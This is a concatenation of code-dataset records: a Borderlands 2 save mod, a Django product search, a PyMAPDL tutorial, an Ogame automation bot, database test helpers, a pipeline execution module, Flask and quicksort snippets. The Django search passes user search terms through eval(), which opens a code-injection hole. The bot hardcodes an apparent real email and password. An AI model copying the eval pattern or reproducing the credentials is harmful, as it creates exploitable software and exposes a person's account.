inventory.append(self.get_weapon_from_data(defdata))\n else:\n curr_equipped.append((WeaponSaveGameData.Quickslot, self.get_weapon_from_data(defdata)))\n curr_equipped.sort()\n dump[\"Wpn_Equipped\"] = [x[1] for x in curr_equipped]\n dump[\"Weapons\"] = inventory\n\n inventory = []\n curr_equipped = []\n for InventorySaveGameData in SaveGame.ItemData:\n defdata = InventorySaveGameData.DefinitionData\n if not InventorySaveGameData.bEquipped:\n inventory.append(self.get_item_from_data(defdata).copy())\n else:\n curr_equipped.append(self.get_item_from_data(defdata))\n dump[\"Itm_Equipped\"] = curr_equipped\n dump[\"Items\"] = inventory\n dump[\"Bank\"] = bank\n json.dump(dump, fd, indent=4)\n logging.logger.debug(f\"Successfully wrote to {fd}\")\n\n def on_save_game(self, params):\n if self.get_player_controller() and self.get_player_controller().Pawn:\n read_f = open(self.LOAD_PATH, \"r\")\n try: # This case only happens when the .json is completely empty, then it cant be decoded\n bank = json.load(read_f).get(\"Bank\", dict())\n except:\n bank = dict()\n read_f.close()\n logging.logger.debug(f\"Trying to write to {self.LOAD_PATH}\")\n with open(self.LOAD_PATH, \"w\") as file:\n self.save_backpack(file, params.SaveGame, bank)\n\n def compare_and_load(self):\n inv_manager = self.get_player_controller().GetPawnInventoryManager()\n logging.logger.debug(f\"Found InventoryManager as: {self.get_full_name(inv_manager) if inv_manager else None}\")\n with open(self.LOAD_PATH, \"r\") as file:\n logging.logger.debug(f\"Successfully opened file {self.LOAD_PATH}\")\n try:\n json_save_file = json.load(file)\n for weapons in json_save_file[\"Weapons\"]:\n my_weap_def = tuple(value if isinstance(value, int)\n else FindObject(\"Object\", value) for value in weapons.values())\n # inv_manager.AddBackpackWeaponFromDefinitionData(my_weap_def)\n inv_manager.ClientAddWeaponToBackpack(my_weap_def, 1, False)\n for slot, weapons in enumerate(json_save_file[\"Wpn_Equipped\"]):\n my_weap_def = tuple(value if isinstance(value, int)\n else FindObject(\"Object\", value) for value in weapons.values())\n inv_manager.AddBackpackWeaponFromDefinitionData(my_weap_def)\n # inv_manager.ClientAddWeaponToBackpack(my_weap_def, 1, True)\n # inv_manager.ServerReadyWeaponFromBackpack(my_weap_def, slot + 1, 1)\n\n for items in json_save_file[\"Items\"]:\n my_item_def = tuple(value if isinstance(value, int)\n else FindObject(\"Object\", value) for value in items.values())\n # inv_manager.AddBackpackItemFromDefinitionData(my_item_def)\n inv_manager.ClientAddItemToBackpack(my_item_def, 1, 1, False)\n for items in json_save_file[\"Itm_Equipped\"]:\n my_item_def = tuple(value if isinstance(value, int)\n else FindObject(\"Object\", value) for value in items.values())\n inv_manager.AddBackpackItemFromDefinitionData(my_item_def)\n # inv_manager.ClientAddItemToBackpack(my_item_def, 1, 1, True)\n logging.logger.debug(f\"Successfully loaded the .json!\")\n except Exception as e:\n logging.logger.debug(e)\n logging.logger.debug(f\"{file} is empty or not a .json!\")\n\n def bank_on_open(self, caller):\n if caller.MaxSlots == 4:\n caller.ChestSlots = self.stash_size\n # we opened the stash\n read_f = open(self.STASH_PATH, \"r\")\n bank = json.load(read_f)\n else:\n read_f = open(self.LOAD_PATH, \"r\")\n bank = json.load(read_f).get(\"Bank\", dict())\n read_f.close()\n owner = self.get_player_controller().Pawn\n\n static_wweapon = unrealsdk.FindAll(\"WillowWeapon\")[0]\n static_witem = unrealsdk.FindAll(\"WillowItem\")[0]\n\n bank_things = []\n for weapon in bank.get(\"Weapons\", list()):\n item_def = tuple(value if isinstance(value, int)\n else FindObject(\"Object\", value) for value in weapon.values())\n new_weapon = static_wweapon.CreateWeaponFromDef(item_def, owner, True)\n\n bank_things.append((new_weapon.Class, tuple(), new_weapon))\n\n for item in bank.get(\"Items\", list()):\n item_def = tuple(value if isinstance(value, int)\n else FindObject(\"Object\", value) for value in item.values())\n new_item = static_witem.CreateItemFromDef(item_def, owner, 1, True)\n\n bank_things.append((new_item.Class, tuple(), new_item))\n caller.TheChest = bank_things\n caller.ChestIsOpen = True\n return False\n\n def bank_on_close(self, caller):\n if caller.MaxSlots == 4:\n read_f = open(self.STASH_PATH, \"r\")\n save_json = json.load(read_f)\n else:\n read_f = open(self.LOAD_PATH, \"r\")\n save_json = json.load(read_f)\n read_f.close()\n wweapon_class = unrealsdk.FindClass(\"WillowWeapon\")\n\n bank = {\"Weapons\": list(), \"Items\": list()}\n for chest_data in caller.TheChest:\n if not chest_data.Inventory:\n break\n\n if chest_data.Inventory.Class == wweapon_class:\n bank[\"Weapons\"].append(self.get_weapon_from_data(chest_data.Inventory.DefinitionData))\n else:\n bank[\"Items\"].append(self.get_item_from_data(chest_data.Inventory.DefinitionData))\n chest_data.Inventory.Destroy()\n chest_data.Inventory = None\n\n self.get_player_controller().OnChestClosing(caller)\n caller.ChestIsOpen = False\n\n with open(self.LOAD_PATH if caller.MaxSlots != 4 else self.STASH_PATH, \"w\") as f:\n if caller.MaxSlots == 4:\n json.dump(bank, f, indent=4)\n else:\n save_json[\"Bank\"] = bank\n json.dump(save_json, f, indent=4)\n return False\n\n def check_load_json_is_valid(self):\n if self.LOAD_PATH is None:\n return False\n with open(self.LOAD_PATH, \"r\") as file:\n try:\n json_save_file = json.load(file)\n logging.logger.debug(f\"{self.LOAD_PATH} is valid JSON.\")\n\n return True\n except Exception as e:\n # we could not load the json or work with it, so instead load the original .sav items\n logging.logger.error(e)\n self.b_new_save = True\n logging.logger.debug(f\"{self.LOAD_PATH} is invalid JSON.\")\n return False\n","sub_path":"Constructor/bl2pysave.py","file_name":"bl2pysave.py","file_ext":"py","file_size_in_byte":18088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"508977608","text":"'''Sort the bytes of a BMP image'''\n\ndef BMP_sort():\n path = input(\"Photo: \")\n with open(path, \"rb\") as file:\n data = file.read()\n path_2 = input(\"File name: \")\n out = open(path_2, \"ab\")\n out.write(data[:54])\n image_bytes = data[54:]\n pixels = [image_bytes[i:i+3] for i in range(0, len(image_bytes), 3)]\n for i in sorted(pixels):\n out.write(bytes(i))\n out.close()\n\nif __name__ == \"__main__\":\n BMP_sort()","sub_path":"BMP_sort.py","file_name":"BMP_sort.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"501995535","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom django.db.models import Q\nfrom products.models import Product\nfrom .models import Users\nfrom .models import Calificaciones\nfrom .models import Product_extras\n\nimport re\nimport datetime\n\nbusqueda_esquema = {\n'nombre' : \"Q(Nombre__icontains = 'ABCDEFG' )\",\n'categoria' : \"Q(Categoria__icontains = 'ABCDEFG' )\",\n'estado' : \"Q(Estado__icontains = 'ABCDEFG' )\",\n'municipio' : \"Q(Municipio__icontains = 'ABCDEFG' )\",\n'colonia' : \"Q(Colonia__icontains = 'ABCDEFG' )\",\n}\n\n\n\ndef coincidencia(texto_entrada):\n\t#print \"texto entrada ::\", texto_entrada\n\tif texto_entrada != \"\":\n\t\t\n\t\tsentencia = \"\" \n\t\tterminos_busqueda = texto_entrada.split(' ')\n\t\tfor cada_termino in terminos_busqueda:\n\t\t\tconsulta = \"\" \n\t\t\tfor cada_restriccion in busqueda_esquema:\n\t\t\t\tconsulta += busqueda_esquema[cada_restriccion] + \" | \"\n\t\t\tconsulta = re.sub(\"ABCDEFG\", cada_termino, consulta)\n\t\t\tconsulta = consulta[:len(consulta)-2]\n\t\t\tsentencia += \"Product.objects.filter(\"+consulta+\") & \"\n\t\t\n\t\tproductos_encontrados = eval(sentencia[:len(sentencia)-2])\n\t\t\t\n\t\treturn productos_encontrados\n\t\n\telse:\n\t\treturn []\n\ndef productos_comentados_ciudad(prod_max, ciudad):\n\tproductos_base = Product.objects.filter(Q(Estado__icontains=ciudad)|Q(Municipio__icontains=ciudad)).values_list('id', flat=True)\n\t#print productos_base\n\tcalificaciones_positivas = Calificaciones.objects.filter(Q(calificacion_producto__gte=3)).values_list('product_id', flat=True)\n\t#print calificaciones_positivas\n\tproductos_mejor_comentados = []\n\ti = 0\n\tfor cada_producto in productos_base:\n\t\tif cada_producto in calificaciones_positivas:\n\t\t\tproductos_mejor_comentados.append(Product.objects.get(pk=cada_producto))\n\t\t\ti += 1\n\t\t\tif i>prod_max:\n\t\t\t\treturn productos_mejor_comentados\n\n\treturn productos_mejor_comentados\n\n\n\ndef productos_nuevos(prod_max, dias):\n\tfecha_comparacion = datetime.date.today() - datetime.timedelta(days=dias)\n\n\tproductos_base = Product_extras.objects.filter(Q(Fecha_alta__gt=fecha_comparacion)).values_list('Product_id', flat=True)\n\n\tproductos_base = productos_base\n\tproductos_nuevos = []\n\ti = 0\n\tfor cada_producto in productos_base:\n\t\tproductos_nuevos.append(Product.objects.get(pk=cada_producto))\n\t\ti += 1\n\t\tif i>prod_max:\n\t\t\treturn productos_nuevos\n\n\treturn productos_nuevos\n\n\t\n\n\n\n\n\n\n\n","sub_path":"entrega _abril/recommender/products/busqueda.py","file_name":"busqueda.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"383049035","text":"\"\"\"\n.. _ref_mapdl_math_basic:\n\nPyMAPDL APDLMath Basic Operations\n---------------------------------\n\nThis tutorial shows how you can use pymapdl to use APDL math for basic\noperations on APDLMath vectors and matrices in the APDL memory\nworkspace.\n\nThe `ansys.mapdl.math` submodule gives access to APDLMath features\ninside PyMAPDL.\n\n\"\"\"\nimport numpy as np\n\nfrom ansys.mapdl.core import launch_mapdl\n\n# Start MAPDL as a service and create an APDLMath object.\nmapdl = launch_mapdl()\nmm = mapdl.math\n\n\n###############################################################################\n# Create and Manipulate Vectors\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Create 2 APDLMath vectors of size 5. :math:`\\vec{v}` is initialized with\n# ones, $\\vec{w}$ is filled with random values\n#\n# Corresponding APDLMath commands\n# - `*VEC,V,D,ALLOC,5`\n# - `*INIT,V,CONST,1`\n# - `*VEC,W,D,ALLOC,5`\n# - `*INIT,W,RAND`\n\nv = mm.ones(5)\nw = mm.rand(5)\nprint(w)\n\n\n###############################################################################\n# Use operators on vectors\n# ~~~~~~~~~~~~~~~~~~~~~~~~\n# Just like `numpy` PyMAPDL APDLMath vectors can be have most of the\n# standard operators (e.g. ``+, -, +=, -=, *=``)\n#\n# Here we form :math:`\\vec{z}=\\vec{v}+\\vec{w}`\n#\n# Then we compute :math:`\\|z\\|_2` (the default `norm` is nrm2, but you\n# can use `.norm('nrm1')` or `.norm('nrminf')` for different normals.\n# See `help(z.norm)` for additional details.\n#\n# APDLMath Commands:\n# - `*VEC,Z,D,COPY,V`\n# - `*AXPY,1,,W,1,,Z`\n# - `*NRM,Z,,nrmval`\n\nz = v + w\nz.norm()\n\n\n###############################################################################\n# Methods\n# ~~~~~~~\n# Alternatively you can use methods, following the numpy\n# standards. Available methods are:\n#\n# - `mm.add()`\n# - `mm.subtract()`\n# - `mm.dot()`\n#\n# Equivalent operator:\n# `z = v + w`\n#\n# Equivalent APDLMath Commands:\n# - `*VEC,Z,D,COPY,V`\n# - `*AXPY,1,,W,1,,Z`\nz = mm.add(v, w)\nz.norm()\n\n###############################################################################\n# Subtraction\n#\n# Equivalent operator:\n# z = v - w\n#\n# Equivalent APDLMath Commands:\n# - `*VEC,Z,D,COPY,V`\n# - `*AXPY,-1,,W,1,,Z`\nz = mm.subtract(v, w)\nprint(z)\n\n\n###############################################################################\n# Dot product of 2 vectors\n#\n# Equivalent APDLMath Command: `*DOT,V,W,dotval`\n\nvw = mm.dot(v, w)\nprint(\"Dot product :\", str(vw))\n\n\n###############################################################################\n# Perform an in-place operations (without copying vectors)\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#\n# In-Place Addition\n#\n# MAPDL Commands:\n# - `*AXPY,1,,V,1,,Z`\n# - `*PRINT,Z`\nv += v\nprint(v)\n\n\n###############################################################################\n# In-Place Multiplication\n#\n# MAPDL Command: `*SCAL,v,2`\nv *= 2\nprint(v)\n\n###############################################################################\n# In-Place Multiplication\n#\nv /= 2.0\nprint(v)\n\n\n###############################################################################\n# Working with Dense Matrices\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Allocate two dense matrices with random values.\n#\n# MAPDL Commands:\n#\n# - `*DMAT,m1,D,ALLOC,4,5`\n# - `*INIT,m1,RAND`\n# - `*DMAT,m1,D,ALLOC,4,5`\n# - `*INIT,m1,CONST,1`\n\nm1 = mm.rand(4, 5)\nm2 = mm.ones(4, 5)\nm1, m2\n\n###############################################################################\n# **Add** these 2 dense matrices, and **scale** the result matrix.\n#\n# Mapdl Commands\n# - `*DMAT,m3,D,COPY,m1`\n# - `*AXPY,1,,m2,1,,m3`\nm3 = m1 + m2\nprint(m3)\n\nm3 *= 2\nprint(m3)\n\n###############################################################################\n# ***Transpose*** a Matrix\n#\nm4 = m3.T\nprint(m4)\n\n\n###############################################################################\n# As for vectors, methods are also available as an alternative to operators.\nm3 = mm.add(m1, m2)\nprint(m3)\n\n\n###############################################################################\n# Compute a matrix vector multiplication\n#\nmw = m3.dot(m4)\nprint(mw)\n\n\n###############################################################################\n# APDLMath matrices can be identified by printing, viewing their types, or with using the `__repr__` method by simply typing out the variable\n#\n# APDLMath Matrix\n# ~~~~~~~~~~~~~~~\ntype(m1)\nprint(m1)\nm1\n\n\n###############################################################################\n# APDLMath Vector\n#\ntype(w)\nprint(w)\nw\n\n###############################################################################\n# Numpy methods on APDLMath objects\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Regardless of the underlying APDLMath object type, you are generally\n# able to perform most numpy or scipy operations on these arrays. You\n# can do this one of two ways. First, you can convert a matrix to a numpy array:\napdl_mat = mm.rand(5, 5)\nnp_mat = apdl_mat.asarray()\nprint(np_mat)\n\n\n###############################################################################\n# Alternatively, you can simply use numpy to compute the max of the array\n#\n# This works because PyMAPDL copies over the matrix to the local\n# python memory and then computes the max using numpy.\nprint(np.max(apdl_mat))\n\n\n###############################################################################\n# This works for most numpy operations, but keep in mind that\n# operations that are supported within MAPDL (such as adding or\n# multiplying arrays) will compute much faster as the data is not copied.\n#\napdl_arr = mm.rand(5, 5)\nnp_array = apdl_mat.asarray()\nprint(np.allclose(apdl_mat, np_array))\n\n###############################################################################\n# Stop mapdl\n# ~~~~~~~~~~\n#\nmapdl.exit()\n","sub_path":"examples/01-apdlmath-examples/basic_operations.py","file_name":"basic_operations.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"626183645","text":"import settings\nfrom seleniumAPI import OgameAPI\nfrom builder import Builder\nfrom farmer import Farmer\nfrom timer import Timer\n\nimport time\nfrom random import randint\n\nINF = 9999999\n\nclass Bot:\n\n def __init__(self, email, password, universe):\n self.api = OgameAPI(email=email, password=password, universe=universe)\n\n def sleep(self, sleep_time=INF):\n if sleep_time == INF:\n sleep_time = randint(1, 5000)\n settings.logger.info('Sleeping for ' + str(sleep_time) + ' seconds.')\n time.sleep(sleep_time)\n\n\n def build_resources_on_all_planets(self):\n builder = Builder()\n\n planets = self.api.get_all_planets()\n min_resource_building_time = INF\n\n for planet in planets:\n self.api.go_to_planet(planet=planet)\n self.api.update_planet_resources_info(planet=planet)\n self.api.update_planet_resource_buildings_info(planet=planet)\n\n build_time = builder.build_next_resource_or_storage_building(api=self.api, planet=planet)\n\n min_resource_building_time = min(min_resource_building_time, build_time)\n\n return min_resource_building_time\n\n def handle_planet(self, planet):\n builder = Builder()\n farmer = Farmer()\n\n build_time = 0\n farmer_wait_time = 0\n\n self.api.update_planet(planet=planet)\n\n # If the mines are below a certain level, build mines. After, begin farming operations\n if planet.resource_buildings['metal_mine']['level'] < 9:\n build_time = builder.build_next_resource_or_storage_building(api=self.api, planet=planet)\n else:\n # Conduct farming operations first in case building tech is necessary.\n farmer_wait_time = farmer.conduct_farming_operations(api=self.api, planet=planet)\n\n self.api.update_planet(planet=planet)\n\n build_time = builder.build_next_resource_or_storage_building(api=self.api, planet=planet)\n\n if build_time == 0:\n build_time = builder.get_minimum_time_to_build_next_preferred_resources_building(api=self.api, planet=planet)\n\n return min(build_time, farmer_wait_time)\n\n def handle_all_planets(self):\n planets = self.api.get_all_planets()\n\n for planet in planets:\n sleep_time = self.handle_planet(planet=planet)\n\n self.sleep(sleep_time)\n\n def start(self):\n\n if self.api.login():\n settings.logger.info(\"Login success.\")\n else:\n settings.logger.info(\"Login failed.\")\n\n resources_build_wait_time = INF\n while True:\n\n if self.api.logged_in:\n sleep_time = self.handle_all_planets()\n\n else:\n self.api.login()\n\n\nif __name__ == \"__main__\":\n bot = Bot(email='jared.s.earl123@gmail.com', password='4awdrgyJ####', universe='Zibal')\n bot.start()\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"57058761","text":"\"\"\"Provide a mixin class for DesDbi sub-classes meant for testing.\n\nClasses:\n DBTestMixin - Adds methods to a DesDbi sub-class that are useful for\n database access test suites.\n\nSince this is a mixin class, it isn't useful to instantiate it alone or\ncreate subclasses that do not have other parent classes.\n\nDeveloped at:\nThe National Center for Supercomputing Applications (NCSA).\n\nCopyright (C) 2011 Board of Trustees of the University of Illinois.\nAll rights reserved.\n\"\"\"\n\nimport random\n\n\nclass DBTestMixin (object):\n \"\"\"A mixin class to add testing functionality to a DesDbi sub-class.\n\n This class defines a number of methods that typically cannot stand on their\n own. Instead they add functionality to a subclass of coreutils.DesDbi.\n\n The added methods are useful for test suites for database access methods.\n \"\"\"\n\n def __init__(self):\n # Do not invoke parent class's constructor since this class is meant\n # to be used as a parent class of some other subclass of DesDbi and it\n # should invoke (possibly through other parents) its constructor.\n pass\n\n def sequence_create(self, seq_name):\n \"\"\"Create the specified sequence with default initial configuration.\n \"\"\"\n curs = self.cursor()\n try:\n curs.execute('CREATE SEQUENCE %s' % seq_name)\n finally:\n curs.close()\n\n def sequence_recreate(self, seq_name):\n \"\"\"Drop and create the specified sequence with default configuration.\n\n This method returns a context manager, so it may be used in a with\n statement.\n \"\"\"\n self.sequence_drop(seq_name)\n self.sequence_create(seq_name)\n\n class Ctxtmgr:\n \"\"\"A simple context manager the drops a sequence when complete.\n \"\"\"\n\n def __init__(self, con, seq):\n self.con = con\n self.seq = seq\n\n def __enter__(self):\n pass\n\n def __exit__(self, typ, val, traceback):\n self.con.sequence_drop(self.seq)\n\n return Ctxtmgr(self, seq_name)\n\n def table_copy_empty(self, copy_table, src_table):\n \"\"\"Create an empty copy of the source table.\n\n The copy must not already exist.\n\n With the current implementation, the copy will not have any\n constraints, triggers, indexes, etc. except for NOT NULL constraints.\n This means that some operations could succeed on the copy, but fail on\n the source table.\n \"\"\"\n stmt = 'CREATE TABLE %s AS SELECT * FROM %s WHERE 0 = 1' % (\n copy_table, src_table)\n cursor = self.cursor()\n cursor.execute(stmt)\n cursor.close()\n\n def table_can_query(self, table):\n \"\"\"Return Boolean indicating whether table can be queried.\n\n Attempt to retrieve zero rows from the indicated object and return the\n results. If an exception is raised, leave the connection in a usable\n state.\n\n This method can be used to determine whether some table-like object\n with the specified name exists and the current user has permissions to\n select from it; however, it does not ensure that the object is a table\n or that the object exists in any particular schema. The provided table\n name can include a schema prefix to test for the latter case.\n \"\"\"\n curs = self.cursor()\n\n svp = '\"svp_table_query_%s\"' % random.randint(0, 9999999)\n curs.execute('SAVEPOINT ' + svp)\n try:\n curs.execute('SELECT 1 FROM %s WHERE 0 = 1' % table)\n ret = True\n except Exception:\n curs.execute('ROLLBACK TO SAVEPOINT ' + svp)\n ret = False\n finally:\n curs.close()\n\n return ret\n\n def table_create(self, table, columns, types=None):\n \"\"\"Create a simple table.\n\n Create the specified table. The columns and types argument specify the \n table definition in ways that depend on their type, providing a number\n of convenient invocation options to minimize clutter in a test suite.\n\n columns types intrepretation\n ------- -------- ----------------------------------------------------\n string none columns contains the entire table definition\n string string columns names a single column and types provides its\n type\n sequence None each entry in columns provides the full definition\n for a column or other table attribute\n sequence string each entry in columns names a column and types\n provides a single type for all columns.\n sequence sequence each entry in columns names a column and the\n corresponding entry in types provides its type.\n \"\"\"\n if types is None:\n if hasattr(columns, '__iter__'):\n spec = ','.join(columns)\n else:\n spec = columns\n elif hasattr(types, '__iter__'):\n spec = ','.join(['%s %s' % col for col in zip(columns, types)])\n elif hasattr(columns, '__iter__'):\n spec = ','.join(['%s %s' % (col, types) for col in columns])\n else:\n spec = columns + ' ' + types\n\n cursor = self.cursor()\n try:\n cursor.execute('CREATE TABLE %s (%s)' % (table, spec))\n finally:\n cursor.close()\n\n def table_prep_test_copy(self, test_table, src_table, cols, rows):\n \"\"\"Prepare a copy of an existing table for testing purposes.\n\n Drop test_table if it exists. Create a copy of src_table. Insert rows\n into cols of test_table. The cols and rows arguments correspond to\n those arguments of DesDbi.insert_many().\n\n Note that test_table and src_table can be the same if the database is\n configured to automatically access that table in some other schema if\n it doesn't exist in the current user's schema and is configured to\n create new tables in the current user's schema.\n \"\"\"\n self.table_drop(test_table)\n self.table_copy_empty(test_table, src_table)\n self.insert_many(test_table, cols, rows)\n\n def table_recreate(self, table, columns, types=None):\n \"\"\"Drop (if necessary) and create the indicated table.\n\n The columns and types arguments are the same as for table_create().\n\n This method also returns a context manager, so it may be used in a with\n statement.\n \"\"\"\n self.table_drop(table)\n self.table_create(table, columns, types)\n\n class Ctxtmgr:\n \"\"\"A simple context manager the drops a table when complete.\n \"\"\"\n\n def __init__(self, con, tab):\n self.con = con\n self.tab = tab\n\n def __enter__(self):\n pass\n\n def __exit__(self, typ, val, traceback):\n self.con.table_drop(self.tab)\n\n return Ctxtmgr(self, table)\n","sub_path":"python/despydb/dbtestmixin.py","file_name":"dbtestmixin.py","file_ext":"py","file_size_in_byte":7068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"379926834","text":"from flask import Flask,render_template,url_for\napp = Flask(__name__)\n\nposts = [\n {\n 'aothor': 'Andi',\n 'title' : 'Buku Bacaan',\n 'content' : 'First time',\n 'date' : '13 agustus 2000'\n },\n {\n 'aothor': 'Budi',\n 'title' : 'Buku Dongeng',\n 'content' : 'Second time',\n 'date' : '13 April 2000'\n }\n]\n\n@app.route(\"/\")\n@app.route(\"/home\")\ndef home():\n return render_template(\"home_page.html\",posts=posts)\n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about_page.html\",title = 'About')\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"Novice/03.03/tutorial_flask_render_template.py","file_name":"tutorial_flask_render_template.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"210902981","text":"from __future__ import annotations\n\nimport traceback\nfrom collections import defaultdict\nfrom contextlib import contextmanager\nfrom dataclasses import dataclass, field\nfrom typing import TYPE_CHECKING, Callable, Dict, List, Optional\n\nfrom dcp.data_format.base import DataFormat\nfrom dcp.storage.base import Storage, ensure_storage\nfrom loguru import logger\nfrom snapflow.core.data_block import (\n DataBlock,\n DataBlockMetadata,\n ManagedDataBlock,\n StoredDataBlockMetadata,\n)\nfrom snapflow.core.environment import Environment, EnvironmentConfiguration\nfrom snapflow.core.function import DEFAULT_OUTPUT_NAME, DataFunction\nfrom snapflow.core.function_interface_manager import StreamInput\nfrom snapflow.core.graph import DeclaredGraph, NxAdjacencyList, graph_from_node_configs\nfrom snapflow.core.metadata.orm import FrozenPydanticBase, PydanticBase\nfrom snapflow.core.node import DataFunctionLog, DeclaredNode, Node, NodeConfiguration\nfrom sqlalchemy.sql.expression import select\n\n\nclass ExecutionLogger:\n def __init__(self, out: Callable = lambda x: print(x, end=\"\")):\n self.out = out\n self.curr_indent = 0\n self.indent_size = 4\n\n @contextmanager\n def indent(self, n=1):\n self.curr_indent += n * self.indent_size\n yield\n self.curr_indent = max(self.curr_indent - n * self.indent_size, 0)\n\n def log(self, msg: str, prefix=\"\", suffix=\"\", indent: int = 0):\n total_indent = self.curr_indent + indent * self.indent_size\n lines = msg.strip(\"\\n\").split(\"\\n\")\n full_prefix = total_indent * \" \" + prefix\n sep = suffix + \"\\n\" + full_prefix\n message = full_prefix + sep.join(lines) + suffix\n self.out(message)\n if msg.endswith(\"\\n\"):\n self.out(\"\\n\")\n\n def log_token(self, msg: str):\n self.out(msg)\n\n\nclass ExecutionConfiguration(FrozenPydanticBase):\n env_config: EnvironmentConfiguration\n local_storage_url: str\n target_storage_url: str\n target_format: str = None\n storage_urls: List[str] = None\n # runtime_urls: List[str] = None\n # run_until_inputs_exhausted: bool = True # TODO: punt on repeated runs for now, v confusing\n # TODO: this is a \"soft\" limit, could imagine a \"hard\" one too\n execution_timelimit_seconds: Optional[int] = None\n logger: str = None # TODO: how to specify this in serializable way?\n\n\n@dataclass(frozen=True)\nclass ExecutionContext:\n env: Environment\n local_storage: Storage\n target_storage: Storage\n target_format: Optional[DataFormat] = None\n storages: List[Storage] = None\n logger: ExecutionLogger = field(default_factory=ExecutionLogger)\n execution_timelimit_seconds: Optional[int] = None\n abort_on_function_error: bool = False\n execution_config: ExecutionConfiguration = None\n\n @staticmethod\n def from_config(cfg: ExecutionConfiguration) -> ExecutionContext:\n env = Environment.from_config(cfg.env_config)\n return ExecutionContext(\n env=env,\n local_storage=ensure_storage(cfg.local_storage_url),\n target_storage=ensure_storage(cfg.target_storage_url),\n target_format=None, # TODO: from config\n storages=[ensure_storage(s) for s in cfg.storage_urls],\n # logger=ExecutionLogger(), # TODO: from config\n execution_timelimit_seconds=cfg.execution_timelimit_seconds,\n abort_on_function_error=env.settings.abort_on_function_error,\n execution_config=cfg,\n )\n\n\nclass ExecutableConfiguration(FrozenPydanticBase):\n node_key: str\n function_key: str\n execution_config: ExecutionConfiguration\n nodes: Dict[str, NodeConfiguration]\n\n\n@dataclass(frozen=True)\nclass Executable:\n node: Node\n function: DataFunction\n execution_context: ExecutionContext\n executable_config: ExecutableConfiguration = None\n # graph_adjacency: NxAdjacencyList # Graph is implied by node_key (nodes only belong to one graph)\n\n @staticmethod\n def from_config(cfg: ExecutableConfiguration) -> Executable:\n ec = ExecutionContext.from_config(cfg.execution_config)\n graph = graph_from_node_configs(ec.env, cfg.nodes.values())\n return Executable(\n node=graph.get_node(cfg.node_key),\n function=ec.env.get_function(cfg.function_key),\n execution_context=ec,\n executable_config=cfg,\n )\n\n\n# @dataclass\n# class DataBlockSummary:\n# id: str\n# record_count: Optional[int] = None\n# alias: Optional[str] = None\n\n\nclass ExecutionResult(PydanticBase):\n inputs_bound: List[str]\n non_reference_inputs_bound: List[str]\n input_block_counts: Dict[str, int]\n output_blocks: Optional[Dict[str, Dict]] = None\n error: Optional[str] = None\n traceback: Optional[str] = None\n\n @classmethod\n def empty(cls) -> ExecutionResult:\n return ExecutionResult(\n inputs_bound=[],\n non_reference_inputs_bound=[],\n input_block_counts={},\n )\n\n def set_error(self, e: Exception):\n tback = traceback.format_exc()\n self.error = (\n str(e) or type(e).__name__\n ) # MUST evaluate true if there's an error!\n # Traceback can be v large (like in max recursion), so we truncate to 5k chars\n self.traceback = tback[:5000]\n\n def get_output_block(\n self, env: Environment, name: Optional[str] = None\n ) -> Optional[DataBlock]:\n\n if not self.output_blocks:\n return None\n if name:\n dbid = self.output_blocks[name][\"id\"]\n else:\n dbid = self.output_blocks[DEFAULT_OUTPUT_NAME][\"id\"]\n env.md_api.begin() # TODO: hanging session\n block = env.md_api.execute(\n select(DataBlockMetadata).filter(DataBlockMetadata.id == dbid)\n ).scalar_one()\n mds = block.as_managed_data_block(env)\n return mds\n\n\nclass CumulativeExecutionResult(PydanticBase):\n input_block_counts: Dict[str, int] = {}\n output_blocks: Optional[Dict[str, List[Dict]]] = {}\n error: Optional[str] = None\n traceback: Optional[str] = None\n\n def add_result(self, result: ExecutionResult):\n for i, c in result.input_block_counts.items():\n self.input_block_counts[i] = self.input_block_counts.setdefault(i, 0) + c\n for i, dbs in result.output_blocks.items():\n self.output_blocks.setdefault(i, []).append(dbs)\n if result.error:\n self.error = result.error\n self.traceback = result.traceback\n\n def get_output_blocks(\n self, env: Environment, name: Optional[str] = None\n ) -> List[DataBlock]:\n blocks = []\n if not self.output_blocks:\n return blocks\n env.md_api.begin() # TODO: hanging session\n for bs in self.output_blocks[name or DEFAULT_OUTPUT_NAME]:\n dbid = bs[\"id\"]\n block = env.md_api.execute(\n select(DataBlockMetadata).filter(DataBlockMetadata.id == dbid)\n ).scalar_one()\n mds = block.as_managed_data_block(env)\n blocks.append(mds)\n return blocks\n","sub_path":"snapflow/core/execution/executable.py","file_name":"executable.py","file_ext":"py","file_size_in_byte":7099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"395073079","text":"from random import randint\n\ndef quicksort(arr):\n if len(arr) < 2: return arr\n smaller, equal, larger = [], [], []\n pivot = arr[randint(0, len(arr)-1)]\n\n for x in arr:\n if x < pivot: smaller.append(x)\n elif x == pivot: equal.append(x)\n else: larger.append(x)\n\n return quicksort(smaller) + equal + quicksort(larger)\n\ndef quicksort_2(arr, lo, hi):\n if len(arr) < 2: return arr\n if lo < hi:\n pi = partition(arr, lo, hi)\n quicksort_2(arr, lo, pi-1)\n quicksort_2(arr, pi+1, hi)\n\ndef partition(arr, lo, hi):\n i = lo - 1\n pivot = arr[hi]\n for j in range(lo, hi):\n if arr[j] <= pivot:\n i = i + 1\n arr[i], 